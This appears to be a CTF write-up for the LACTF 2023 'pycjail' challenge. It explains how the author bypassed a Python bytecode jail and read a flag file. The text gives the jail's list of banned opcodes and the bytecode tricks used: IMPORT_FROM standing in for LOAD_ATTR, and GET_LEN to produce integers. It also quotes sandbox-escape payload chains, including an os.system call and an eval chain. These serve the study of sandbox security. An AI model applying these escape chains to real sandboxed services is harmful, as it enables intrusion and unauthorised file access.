Writeup - Pycjail (LACTF 2023)
- Type - jail
- Name - pycjail
- Points - 495
All of you think you're so cute with your fancy little sandbox bypasses, but jokes on
This challenge required you to bypass a Python jail, which limited several aspects of a custom
code object you created. The source code for the jail is here, or below:
To summarize the code above, you provided the co_code bytes for a custom code object that was then created and run. The restrictions imposed were:
- max 3 consts
- max 4 names
- max 15 opcodes
- opcodes can’t be in ['IMPORT_NAME', 'MAKE_FUNCTION', 'STORE_SUBSCR', 'DELETE_SUBSCR', 'LOAD_BUILD_CLASS', 'LOAD_ASSERTION_ERROR', 'STORE_NAME', 'DELETE_NAME', 'STORE_ATTR', 'DELETE_ATTR', 'STORE_GLOBAL', 'DELETE_GLOBAL', 'LOAD_NAME', 'LOAD_ATTR', 'JUMP_FORWARD', 'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'JUMP_ABSOLUTE', 'POP_JUMP_IF_FALSE', 'POP_JUMP_IF_TRUE', 'LOAD_GLOBAL', 'JUMP_IF_NOT_EXC_MATCH', 'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'LOAD_CLOSURE', 'LOAD_DEREF', 'STORE_DEREF', 'DELETE_DEREF', 'LOAD_CLASSDEREF', 'LOAD_METHOD'] (aka no import/makefunc/load/store/delete/jump)
- opcode values can’t be > 3
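As a rough illustration of these limits, here is a minimal sketch of a checker. It is not the challenge's actual source: the function name `violates_limits` is hypothetical, and reading "opcode values" as the argument byte that follows each opcode in two-byte wordcode is my assumption.

```python
def violates_limits(consts, names, code, banned_opcodes):
    """Return a short reason if the payload breaks a limit, else None.

    Assumption: `code` is two-byte wordcode (opcode, argument), and the
    "> 3" rule applies to the argument byte.
    """
    if len(consts) > 3:
        return "too many consts"
    if len(names) > 4:
        return "too many names"
    if len(code) % 2 != 0:
        return "odd code length"
    if len(code) // 2 > 15:
        return "too many opcodes"
    for i in range(0, len(code), 2):
        op, arg = code[i], code[i + 1]
        if op in banned_opcodes:
            return "banned opcode"
        if arg > 3:
            return "argument too large"
    return None


# Made-up opcode numbers, purely to exercise the checks.
demo_banned = {1}
ok = violates_limits(("",), ("__class__",), bytes([2, 0, 3, 1]), demo_banned)
bad_op = violates_limits((), (), bytes([1, 0]), demo_banned)
bad_arg = violates_limits((), (), bytes([2, 4]), demo_banned)
print(ok, bad_op, bad_arg)
```

The argument limit matters later on: an index such as 118 cannot be passed directly as an opcode argument or taken from an integer constant, so it has to be produced on the stack some other way.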
Nothing about the flag was mentioned, so it was likely in ./flag.txt, or if they were evil they’d require you to get RCE to read the flag. I was banking on the fact that it was stored in ./flag.txt, so my goal was to get an arbitrary file read.
I made a list of all the Python 3.10 opcodes that were allowed in this jail by pulling from the documentation and removing the opcodes banned in the list above. What caught my eye initially was that the opcodes
CALL_METHOD were not banned, and this is what allows you to call a function on the stack. However, the hard part was getting a callable object on the stack in the first place. The opcodes
LOAD_ATTR are typically used to get a function on the stack, and all
LOAD opcodes were blocked except for
LOAD_CONST (which only allowed us to put strings on the stack). As an example, below shows the bytecode for the line
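A minimal sketch of the filtering step and of why ordinary code fails the jail, assuming the banned list quoted in the restrictions. The line `print('hi')` is a stand-in of my own choosing, and the exact opcode names printed depend on the Python version you run it on (the challenge targeted 3.10).

```python
import dis
import opcode

# Banned names copied from the restriction list in this write-up.
BANNED = {
    'IMPORT_NAME', 'MAKE_FUNCTION', 'STORE_SUBSCR', 'DELETE_SUBSCR',
    'LOAD_BUILD_CLASS', 'LOAD_ASSERTION_ERROR', 'STORE_NAME', 'DELETE_NAME',
    'STORE_ATTR', 'DELETE_ATTR', 'STORE_GLOBAL', 'DELETE_GLOBAL', 'LOAD_NAME',
    'LOAD_ATTR', 'JUMP_FORWARD', 'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP',
    'JUMP_ABSOLUTE', 'POP_JUMP_IF_FALSE', 'POP_JUMP_IF_TRUE', 'LOAD_GLOBAL',
    'JUMP_IF_NOT_EXC_MATCH', 'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST',
    'LOAD_CLOSURE', 'LOAD_DEREF', 'STORE_DEREF', 'DELETE_DEREF',
    'LOAD_CLASSDEREF', 'LOAD_METHOD',
}

# Everything the running interpreter knows about, minus the banned names.
allowed = sorted(name for name in opcode.opmap if name not in BANNED)

# Disassemble an ordinary call and see which of its opcodes are banned.
demo = compile("print('hi')", "<demo>", "eval")
used = {ins.opname for ins in dis.get_instructions(demo)}

print(len(allowed), "opcodes remain")
print("banned opcodes used by an ordinary call:", sorted(used & BANNED))
```

Even this trivial call needs a banned name-loading opcode to fetch `print`, which is why getting a callable onto the stack was the hard part.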
To test various payloads with the provided
main.py script, I created this small script to give me the info I want:
Based on the provided
code_str, it would show me a disassembly of the code, along with
co_code in the form desired.
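A helper along these lines might look like the sketch below. It is not the original script: the function name `describe` is hypothetical, and printing `co_code` as a hex string is my assumption about the input format `main.py` wanted.

```python
import dis


def describe(code_str):
    """Compile an expression and collect the parts the jail asks for."""
    code = compile(code_str, "<payload>", "eval")
    return {
        "disassembly": dis.Bytecode(code).dis(),  # human-readable listing
        "consts": code.co_consts,
        "names": code.co_names,
        "code_hex": code.co_code.hex(),           # raw bytecode as hex
    }


info = describe('"".__class__.__base__')
print(info["disassembly"])
print("consts:", info["consts"])
print("names: ", info["names"])
print("code:  ", info["code_hex"])
```

Compiling real Python this way only gives a starting point, since the compiler will happily emit opcodes the jail rejects.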
Now that I was set up to try stuff, I went through the Python bytecode documentation, opcode by opcode, trying to see if there was anything that would put a callable on the stack. Many of the opcodes were eliminated from the start, such as
CALL_* were going to be useful later on, but wouldn’t help us get a callable onto the stack. After spending about an hour with a teammate looking through the opcodes, we felt like there wasn’t anything there. So we did what anyone would do and asked ChatGPT (no, it wasn’t helpful).
Desperate, we did some more research online, reading through CTF writeups, until I came across a write-up by kmh from DiceCTF 2021. The challenge
TI-1337 Plus CE was also a pyjail, and one of the things this user learned was that “
LOAD_ATTR in disguise!”.
IMPORT_FROM was not banned, but we hadn’t paid much attention to it because it always follows (and only functions properly with) the opcode
IMPORT_NAME, which was banned. However, if we could use it to function as
LOAD_ATTR, then that means we could get a callable onto the stack, and through attribute stacking run some code like
"".__class__.__base__.__subclasses__()()._module.__builtins__["eval"]("insert code here").
It was also apparent that, since the Python compiler never emits IMPORT_FROM in place of LOAD_ATTR on its own, we would have to manually create custom bytecode to be successful. This actually made sense; normally, pyjails just ask for a line of code (a single input() call), but this one had you specify certain parts of the code object you wanted to create. Realizing that the intended bytecode would not be typical, or perhaps even technically compliant, explained the challenge author’s design choice.
Manual testing confirmed our suspicion that
IMPORT_FROM worked as desired, so it was now time to create a payload.
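A minimal sketch of such a manual test, under some assumptions of mine: the helper `assemble` and the `template` function are hypothetical, `co_stacksize=8` is an arbitrary safe value, and the hand-built code object is only executed on Python 3.10 because raw bytecode layouts differ between versions.

```python
import opcode
import sys


def assemble(*instructions):
    """Pack (opname, arg) pairs into 3.10-style two-byte wordcode."""
    out = bytearray()
    for name, arg in instructions:
        out += bytes([opcode.opmap[name], arg])
    return bytes(out)


def template():
    pass


# Intended to behave like `"".__class__`, without LOAD_ATTR.
raw = assemble(("LOAD_CONST", 0), ("IMPORT_FROM", 0), ("RETURN_VALUE", 0))

result = None
if sys.version_info[:2] == (3, 10):
    # Only run hand-written bytecode on the version it was written for.
    code = template.__code__.replace(
        co_code=raw,
        co_consts=("",),
        co_names=("__class__",),
        co_stacksize=8,  # IMPORT_FROM pushes without popping, so leave room
    )
    result = eval(code)

print(raw.hex(), result)
```

One detail worth noting is that IMPORT_FROM leaves the original object on the stack and pushes the attribute on top of it, so chained lookups keep growing the stack rather than replacing the top item.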
A lot of testing and trial and error went into getting a payload that would work. Getting the payload
"".__class__.__base__.__subclasses__ to work was fairly simple; however, we ran into errors doing
$ python3 main.py
The opcode used above was
CALL_METHOD, so I tried
CALL_FUNCTION and it worked! Apparently the two ways of calling functions are by pairing
The next issue we ran into was getting a number on the stack. Because
main.py used the
input() function to get the data, everything was treated as a string. Inserting
1 as a const would always have it render as
'1'. After some research, we settled on the
GET_LEN opcode, which just ran the
len() function on the item on top of the stack. Since our first constant was just an empty string, and the actual value of the string didn’t matter (aka
"abcd".__class__ are the same), we could load that const onto the stack again and run
GET_LEN to put the length of that string onto the stack. We could just set the length of the initial string to whatever we want to obtain the desired integer.
However, a second hiccup was encountered that required 2 additional opcodes to bypass.
GET_LEN pushed the integer we wanted onto the stack, but kept the loaded string on there too, which we didn’t want. I had to insert an extra
POP_TOP opcode to switch the order and remove the string from the stack.
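The stack juggling is easier to follow in a toy model. The sketch below is a hypothetical pure-Python simulator of just the opcodes involved, not real interpreter code. Using ROT_TWO as the opcode that swaps the top two items is my assumption, and a length-3 string stands in for the real, much longer constant.

```python
def run(program, consts, names):
    """Simulate a handful of 3.10 opcodes on a plain Python list."""
    stack = []
    for op, arg in program:
        if op == "LOAD_CONST":
            stack.append(consts[arg])
        elif op == "IMPORT_FROM":
            # Pushes the attribute but keeps the object underneath it.
            stack.append(getattr(stack[-1], names[arg]))
        elif op == "CALL_FUNCTION":
            args = [stack.pop() for _ in range(arg)][::-1]
            func = stack.pop()
            stack.append(func(*args))
        elif op == "GET_LEN":
            # Pushes len(TOS) and leaves TOS in place.
            stack.append(len(stack[-1]))
        elif op == "ROT_TWO":
            stack[-1], stack[-2] = stack[-2], stack[-1]
        elif op == "POP_TOP":
            stack.pop()
        elif op == "BINARY_SUBSCR":
            index = stack.pop()
            container = stack.pop()
            stack.append(container[index])
        elif op == "RETURN_VALUE":
            return stack.pop()
        else:
            raise ValueError(f"unsupported opcode {op}")


program = [
    ("LOAD_CONST", 0), ("IMPORT_FROM", 0), ("IMPORT_FROM", 1),
    ("IMPORT_FROM", 2), ("CALL_FUNCTION", 0),   # list of subclasses
    ("LOAD_CONST", 0), ("GET_LEN", 0),          # ..., list, "aaa", 3
    ("ROT_TWO", 0), ("POP_TOP", 0),             # ..., list, 3
    ("BINARY_SUBSCR", 0), ("RETURN_VALUE", 0),  # list[3]
]
picked = run(program, ("aaa",), ("__class__", "__base__", "__subclasses__"))
print(picked)
```

Changing the length of the string constant changes which subclass is selected, and every opcode argument stays at 3 or below.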
At this point, the payload we had was:
Python code: 'aaaa...aaa'.__class__.__base__.__subclasses__()
We had 2 consts, 1 name, and 4 opcodes left to get what we wanted, but we had access to an extensive list of classes that opened up functionality a lot.
The “stereotypical” payload from HackTricks is to use
''.__class__.__bases__.__subclasses__()()._module.__builtins__['__import__']('os').system('ls') to run system commands (note that this was slightly modified from the Python2 version, and the exact index of
<class 'warnings.catch_warnings'> may vary depending on your installation & version). The problem with this payload was it required another 3 names (
system) and 3 consts (
'ls'), which we didn’t have. We considered making our first const of length 144 the same as our last const (padding our bash payload with extra ;s until we reached our desired length), but we still needed 2 more names than we had left.
Our second thought was
"".__class__.__base__.__subclasses__()()._module.__builtins__["eval"]("insert code here"), but that required 2 names and 2 consts (still 1 too many names).
After perusing the list of available classes one by one, I started looking into the class at index 118, which was
<class '_frozen_importlib_external.FileLoader'>. Looking at this class’s attributes, I saw the function
get_data(), which, when called directly on the class, takes two arguments: a stand-in for self and the path of a file. Excited, I wrote up and tested the code
("a"*118).__class__.__base__.__subclasses__().get_data('flag.txt','flag.txt'), and my local flag was printed! This only required 1 extra name and const (we even had one const leftover), and used exactly 4 more opcodes.
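The file-read primitive can be checked in ordinary Python. This sketch assumes nothing about the challenge server: it looks the class up by name rather than by index (the index varies between installations) and reads a temporary file holding a made-up flag.

```python
import os
import tempfile

# Find the loader class among object's subclasses by name, not by index.
file_loader = next(
    cls for cls in object.__subclasses__()
    if cls.__module__ == "_frozen_importlib_external"
    and cls.__name__ == "FileLoader"
)

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "flag.txt")
    with open(path, "w") as handle:
        handle.write("lactf{local_test_flag}")  # placeholder, not a real flag
    # Called on the class, get_data takes (self, path); the first argument
    # is never used as a loader here, so the path string can fill both slots.
    data = file_loader.get_data(path, path)

print(data)
```

Passing the same string twice is what lets the payload reuse a single constant for both arguments.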
The final payload was: